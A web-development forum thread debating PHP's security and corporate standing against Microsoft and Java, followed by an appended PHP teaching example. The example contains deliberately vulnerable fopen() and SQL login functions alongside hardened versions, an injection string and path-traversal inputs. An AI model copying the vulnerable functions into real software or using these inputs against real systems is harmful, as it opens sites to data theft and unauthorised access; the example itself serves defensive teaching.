#1
Since the original thread was killed because I dared to break from the pack...locked after someone said their piece and called me a troll no less...it was suggested that a new thread be started to continue this conversation.

Anyway, before I'm banned because I dare to have a view opposite that of what seems to be the norm here, I'll ask again... If anyone can shed some real life examples on security issues in PHP, I would really like to hear it. Not about the way a user writes his/her code, because I think we all will agree that bad code can kill just about anything, but about security problems with PHP itself.

ps If it takes your admins two days to figure out that they don't need 'TIER 1' support to boot into single-user mode and change a lost/hacked root password, then they need to be fired.

---- If a server crashes in the woods, and no one is around to hear it, is it still Windows?
#2
> Since the original thread was killed because I dared to break from the pack...locked after someone said their piece and called me a troll no less...it was suggested that a new thread be started to continue this conversation.

jnichel,

> Anyway, before I'm banned

We won't ban you. You are welcome here. I just won't get involved this time! Please continue to post here, your input is welcome.

Take care -- Regards, Tim Scarfe <tim@developer-x.com> http://www.developer-x.com
#3
> ps If it takes your admins two days to figure out that they don't need 'TIER 1' support to boot into single-user mode and change a lost/hacked root password, then they need to be fired.

heh. I didn't say I agreed with that one either. I thought those guys were idiots, but since we were consultants...(I'll give you an idea: they were running Cold Fusion on a 4 proc Sun Enterprise Server, and they compiled CF so that all requests would only work with one processor...)

Look, how about we do this: if you are as knowledgeable about PHP security issues as you imply, how about you give us some comparison examples of the superiority of PHP's security over MS's. Something like "Using htaccess is more secure than Active Directory and IIS integration because...". I close down threads that tend to get emotional because there ends up being a lot of words thrown out without anything backing them up. I may end up closing this one down too, who knows--because there's nothing more useless than people saying "this is better"..."no, THIS is better" without any reasons why. So give us some examples. I'm listening (because I'm actually interested).
#4
> Originally posted by ttrenka
> look, how about we do this: if you are as knowledgeable about PHP security issues as you imply, how about you give us some comparison examples of the superiority of PHP's security over MS's. Something like "Using htaccess is more secure than Active Directory and IIS integration because...".

I gave that in the last thread. It really has little to do with ASP / .NET vs PHP, but more to do with the OSes. Just by the very nature of Windows, the amount of access it will grant to scripts is more security-prone than on a *nix system. This may not be the case for 2003 Server, as I've heard MS has made some major changes in the way permissions are handled, but I've never seen a running 2003 machine, so I can't speak to that. And I haven't used MS in the server world since '97, so I can't really speak to .htaccess vs Active Directory. But I'm not trying to compare the two...I only responded to others comparing them.

> So give us some examples. I'm listening (because I'm actually interested).

I don't have any MS examples...I don't use it, and that's not what I'm here for. My main purpose for starting this thread was to get those who complained/hinted that PHP is an insecure way of creating web apps to point out security issues they have found. I really don't care if .NET talks to MSSQL better than PHP, or if JSP parses XML documents faster than PHP. What I do care about is real life security issues in PHP. Like I said in the earlier thread, I use it on a daily basis, both personally and professionally, so if you know of a problem, I want to hear it. I don't care if y'all think it's a 'kiddie language', a 'joke', or only used for 'toilet paper inventory'...that's trolling, and does me no good in deciding if I have an issue that needs to be addressed in my place of work.

---- If a server crashes in the woods, and no one is around to hear it, is it still Windows?
#5
> and does me no good in deciding if I have an issue that needs to be addressed in my place of work.

Ah, see, that's different. Had you said that in the other thread, it would still be open. This last P of yours explains your concern very well...and I wouldn't regard this as trolling at all.

As far as I know (and I haven't worked with PHP for a couple of years, so I'm not the person most knowledgeable about this) the security issues most would encounter are app-based (hence all the remarks)...like SQL Injection attacks, brute force password attacks (when not using the OS to handle the pwd), DoS attacks, etc. So when you are thinking of these, you (the proverbial you, not you personally) tend to think in terms of coding your app to be fairly secure. Yes, MS has had a number of problems relating to buffer overruns...and I presume that most flavors of UNIX have not had these problems. But then most flavors of UNIX don't have an extensive UI over it, which in some ways is real good and in some ways (primarily in acceptance) pretty bad. How many corp users are going to want to use a console to do their work? Remember after all that it wasn't until the release of Windows that MS really began the road to dominance (before that it was Apple that dominated the general public--NOT the pure programming set mind you (UNIX all the way!)). Sure, there are lots of issues with MS. Doesn't really seem like nearly as much with the .NET Framework though. I'm not a security expert though (cough Alex are you there cough), so I couldn't pinpoint the major issues with both systems. But I've become convinced that security is not MS's issue alone, they're just the target of choice. If OS X was the dominant OS, or Linux for that matter, I'm sure we'd be hearing about a lot more security flaws with those systems than we do. As far as PHP being a kiddie language...hey, if you like Perl syntax, then more power to you. That's probably the main beef with it that most people who don't like it have.

As far as a corp environment goes, I would say (once again) that it doesn't have the popularity that Java enjoys mainly because there aren't any major corporations behind it (that's what I meant by the Tier 1 comment). If there were...it would probably be a different story. Sucks but true. If you don't believe that, take a look in the national (US) job listings. I'd say it's about 75% Java listings and about 23% MS ones. If PHP were supported more, it would probably be different. But corps are a lot more likely to want Apache Tomcat around than PHP. Of course, if you know different, please speak up.
#6
> Originally posted by ttrenka
> and does me no good in deciding if I have an issue that needs to be addressed in my place of work. Ah, see, that's different. Had you said that in the other thread, it would still be open. This last P of yours explains your concern very well...and I wouldn't regard this as trolling at all

I did say that... If you're willing to post some actual security problems with PHP...without the MS spin...I'm more than willing to listen, and discuss it. I use PHP daily in both personal and professional life (for a company that does more than one billion dollars a year in sales), and if there are security issues with it that have escaped our radar, I'd really like to know.

> Yes, MS has had a number of problems relating to buffer overruns...and I presume that most flavors of UNIX have not had these problems. But then most flavors of UNIX don't have an extensive UI over it, which in some ways is real good and in some ways (primarily in acceptance) pretty bad. How many corp users are going to want to use a console to do their work? Remember after all that it wasn't until the release of Windows that MS really began the road to dominance (before that it was Apple that dominated the general public--NOT the pure programming set mind you (UNIX all the way!)).

Don't confuse my usage of things like Linux, Apache, and PHP (we can throw MySQL in there to complete the LAMP) as a dislike for MS. You said in the last thread...'best tool for the job', and personally for the server world, I believe that best tool is a *nix system. For the desktop? Well, I'm typing this message in via a Win2k machine. Corporations are not ready to replace their desktop machines, but they are ready to replace their servers (and are doing so). With the major changes outside of the U.S. in governments and businesses looking away from MS to Open Source solutions, it's going to have a huge impact on MS. Who knows, maybe it will light a fire under Redmond's ass, but they have a lot of ground to make up in the server market. I think their desktop hold is safe for quite a few years to come, but they're on thin ice in the server market...however, that was never their niche.

> I'm not a security expert though (cough Alex are you there cough), so I couldn't pinpoint the major issues with both systems. But I've become convinced that security is not MS's issue alone, they're just the target of choice. If OS X was the dominant OS, or Linux for that matter, I'm sure we'd be hearing about a lot more security flaws with those systems than we do.

No, security isn't just an MS issue, and there are vulnerabilities with other OSes, but like I said in the previous thread, the design of the OS makes the MS issues a bigger problem. Take my Win2k box here...there are many exploits out there that will give an attacker system-wide access to my box by my opening an email, or going to a web page, because Windows allows so much permission to these items. Whereas with most other OSes, if I pick up a malicious program (and I'm not logged in as root), the program is pretty much limited to my home directory. But hey, if the end users of the world would take the time to educate themselves about how to use their computers properly, we wouldn't have near these problems.

> As far as PHP being a kiddie language...hey, if you like Perl syntax, then more power to you. That's probably the main beef with it that most people who don't like it have.

Well, I was a Perl programmer before I even heard of PHP, but both of them have their roots in C. But even if you don't like Perl, you can't knock its power, flexibility, and longevity. I mean, how many languages have come and gone since Perl came on the scene? I think the problem that most people have with Perl today is that they were 'forced' to use it on the web (cgi scripts and all) a few years back, and even though Perl did a decent job, that's never what the language was meant to do. However, I fail to see how PHP's syntax makes it a 'kiddie language'. Do you also consider Perl and C 'kiddie languages'?

> As far as a corp environment goes, I would say (once again) that it doesn't have the popularity that Java enjoys mainly because there aren't any major corporations behind it (that's what I meant by the Tier 1 comment). If there were...it would probably be a different story.

This is apples and oranges. Java and PHP are designed to do two entirely different jobs. I'm willing to bet that PHP is running more web sites than Java....and that Java is running more back-end systems than PHP.

> Sucks but true. If you don't believe that, take a look in the national (US) job listings. I'd say it's about 75% Java listings and about 23% MS ones. If PHP were supported more, it would probably be different. But corps are a lot more likely to want Apache Tomcat around than PHP. Of course, if you know different, please speak up.

It would suck if it were true. We all know Apache is the most popular web server, right? With almost 70% market share.... http://www.securityspace.com/s_surve...311/index.html What's the most popular module for Apache? http://www.securityspace.com/s_surve...pachemods.html Yep, PHP. Over 50% of all Apache servers are running PHP. Hell, that means PHP is running on at least 35% of all web servers out there. I say at least because that URL only takes into account PHP running as a module on Apache....it doesn't count the Apache servers that are compiled with PHP, or the Windows versions of Apache running PHP, or the IIS servers running PHP, etc. Tomcat? Less than 0.04%...not even close to PHP's 53.1%. I just don't understand how y'all can think that corporations are not taking something like PHP seriously, when MAJOR corporations are using it as their web solution, and more than 1/3 of all web servers out there are using it. However, I can talk about it till I'm blue in the face and I'm probably not going to change any minds around here, but that's neither here nor there....and not what I'm looking for.

---- If a server crashes in the woods, and no one is around to hear it, is it still Windows?
#7
> However, I fail to see how PHP's syntax makes it a 'kiddie language'. Do you also consider Perl and C 'kiddie languages'?

Yeah, actually, I never said that either. I don't consider any of the above kiddie languages. Using a period as a string concatenator drives me nuts, though.

I will say that the specs you've got there have to be taken with a grain of salt. I think when people refer to PHP as a "kiddie" language, a large part of the misperception stems from the fact that more than a few personal sites use the PHP/Apache modules, and I've seen at least 3 studies in the past year say the same basic thing as the one you cite...except there's no discrimination as to the purpose of the server.

I don't think corporations are taking it seriously because I haven't heard of *anyone* who's been able to sell a medium to high-end PHP solution. It's that simple. 8 out of 10 people I get to network with regularly tell me (and this is the reason why I personally have not focused on PHP as a primary skill) that they can't sell a PHP solution to a company. With the last consulting company I was with, we did no less than 52 projects over a 5 year period--and only one was a PHP job. I'm looking in the marketplace now, seeing if there's something better for me to go to, and all I see is...Java / Websphere. 75% of the listings I've seen, or the companies I've talked to, are looking for that skill. Dude, if I thought I could make $85k a year doing PHP, I would. I don't see that right now. Maybe in the future, but not right now.

Still, not sure what this has to do with security.
#8
> Originally posted by ttrenka
> However, I fail to see how PHP's syntax makes it a 'kiddie language'. Do you also consider Perl and C 'kiddie languages'? Yeah, actually, I never said that either. I don't consider any of the above kiddie languages. Using a period as a string concatenator drives me nuts, though.

Personally I like that. I mean, I've never actually written any worthwhile Java or C++, but it would seem to me that you can get some unexpected results with '+' being used for both concatenation and mathematical operations. I guess if you're used to it though, it seems more natural.

> I will say that the specs you've got there have to be taken with a grain of salt. I think when people refer to PHP as a "kiddie" language, a large part of the misperception stems from the fact that more than a few personal sites use the PHP/Apache modules, and I've seen at least 3 studies in the past year say the same basic thing as the one you cite...except there's no discrimination as to the purpose of the server.

This was the same for Apache not so long ago. It was just used in personal sites...by the techno-geeks.

> I don't think corporations are taking it seriously because I haven't heard of *anyone* who's been able to sell a medium to high-end PHP solution. It's that simple. 8 out of 10 people I get to network with regularly tell me (and this is the reason why I personally have not focused on PHP as a primary skill) that they can't sell a PHP solution to a company. With the last consulting company I was with, we did no less than 52 projects over a 5 year period--and only one was a PHP job.

I get to see the other side of the fence. The company I work for expanded from just a hardware supplier to a solutions provider two years ago, and the major part of that service is us developing custom PHP web solutions for our clients. We've grown from an 8 man team in 2001 to a 23 member team now, due to the amount of clients that are looking for this exact type of solution. Granted, not all of our clients want this...some do opt for a solution that's backed by MS, Sun, IBM, etc., but it's a pretty even split at my company.

> I'm looking in the marketplace now, seeing if there's something better for me to go to, and all I see is...Java / Websphere. 75% of the listings I've seen, or the companies I've talked to, are looking for that skill.

Those technologies have also been in the limelight longer than PHP, and have major money backing them to get the word out. PHP, like Apache and Linux in their beginnings, is largely word of mouth. Whereas things like Java/JSP, .NET, etc. have suits going to businesses promoting their product. To me, that speaks volumes for PHP; expanding the way it has without marketing muscle.

> Dude, if I thought I could make $85k a year doing PHP, I would. I don't see that right now. Maybe in the future, but not right now.

Sorry, can't help you there. I'm only at $72k, and am classified as a senior project manager...our PHP programmers make in the mid to upper 50's.

> Still, not sure what this has to do with security.

Nothing actually, kind of like my LSU Tigers possibly getting a chance for the national title has nothing to do with it either (had to throw that in since I'm not on the ESPN forums at the moment). I'm just addressing the topics you brought up in the previous post...kind of like I'm doing now. I've kind of given up on someone posting the security problems they hinted to in the original thread. I figure if there were some major security problems, someone would have posted it by now, since the open source community seems to be in the minority on these forums.

---- If a server crashes in the woods, and no one is around to hear it, is it still Windows?
#9
> I figure if there were some major security problems, someone would have posted it by now, since the open source community seems to be in the minority on these forums.

Yep, someone would have posted it. Although this really isn't a forum for those doing server-side work. Most of the people here (when they've delved into it) have been doing either ASP or PHP, so there are some...but I don't think anyone (aside from Dan) would call themselves an expert. And the one security guy I do know (cough ALEX cough) doesn't seem to visit anymore. Has nothing to do with the open source community being here or not. To be honest, it's probably a good, healthy mix. At least you can still pick a fight and not get swamped.
#10
So you just want some security issues? (didn't read the whole thread...)

fopen(), SQL injection (d'oh)... there are many, but you have to tell what kind of exploits you want... real attacks (brute force, DDoS) or code bugs? Maybe it's just you, looking bad!
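The two PHP-side issues this post names, fopen() on user-supplied input and SQL injection (also listed in #5), are the concrete ones the thread asked for, so here is what they look like in code. This is an added illustration written for this page, not code from any poster and not from PHP itself. The function names, the `pages/` directory, the `users` table and the in-memory SQLite database are assumptions made so the script runs offline; the fopen() point rests on PHP's real `allow_url_fopen` directive, under which fopen()/file_get_contents() (and include(), further gated by `allow_url_include` since PHP 5.2) accept `http://` and `ftp://` URLs as well as local paths.

```php
<?php
// Added example, not code from the thread. Assumptions: a 'pages' directory of
// .txt files, a 'users' table, and pdo_sqlite available for the in-memory DB.

// ---- 1. fopen() on user-controlled input -----------------------------------
// With allow_url_fopen=On, ?file=http://attacker.example/x reads remote content,
// and ?file=../../../../etc/passwd walks out of the intended directory. If the
// same value reaches include(), the remote content is executed, not just read.
function read_page_vulnerable(string $file): string
{
    $fh = fopen($file, 'r');                  // nothing constrains $file
    if ($fh === false) {
        return '';
    }
    $data = stream_get_contents($fh);
    fclose($fh);
    return $data;
}

// Hardened: accept only a plain token, map it onto a fixed directory, and
// require the resolved path to stay inside that directory (defeats symlinks
// and any "..", "/", or "scheme://" that the regex would have let through).
function read_page_safe(string $file, string $baseDir): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $file)) {
        return null;                          // no slashes, dots or schemes
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file . '.txt');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                          // missing, or escaped $baseDir
    }
    return file_get_contents($path);
}

// ---- 2. SQL injection ------------------------------------------------------
// Constructed table so the example runs without a server. Plaintext passwords
// are used only to keep the demo short; real code stores password_hash() output.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (name TEXT, pass TEXT)');
$db->exec("INSERT INTO users VALUES ('alice', 'correct-horse')");

// Vulnerable: request data is pasted into the query text, so a value such as
//   ' OR '1'='1
// turns the WHERE clause into one that is true for every row.
function login_vulnerable(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT COUNT(*) FROM users WHERE name = '$user' AND pass = '$pass'";
    return (int) $db->query($sql)->fetchColumn() > 0;
}

// Hardened: a prepared statement sends the query text and the data separately,
// so the quote characters in the attack string are just data.
function login_safe(PDO $db, string $user, string $pass): bool
{
    $st = $db->prepare('SELECT COUNT(*) FROM users WHERE name = ? AND pass = ?');
    $st->execute([$user, $pass]);
    return (int) $st->fetchColumn() > 0;
}

$attack = "' OR '1'='1";
var_dump(login_vulnerable($db, $attack, $attack));   // attacker gets in
var_dump(login_safe($db, $attack, $attack));         // attacker rejected
var_dump(login_safe($db, 'alice', 'correct-horse')); // real user still works
var_dump(read_page_safe('../etc/passwd', __DIR__ . '/pages')); // rejected
```

Run it with `php example.php`: `login_vulnerable()` accepts the attack string as both username and password because the resulting SQL reads `name = '' OR '1'='1' AND pass = '' OR '1'='1'`, while `login_safe()` rejects it and still accepts the real credentials. Note that the PDO prepared statement is the modern fix; in the PHP 4 era this thread dates from, the usual mitigation was escaping input with `mysql_real_escape_string()` before building the query, which works only if applied to every value on every query. For the fopen() case, turning `allow_url_fopen` off in php.ini removes the remote-URL behaviour globally, but the directory check is still needed against local path traversal.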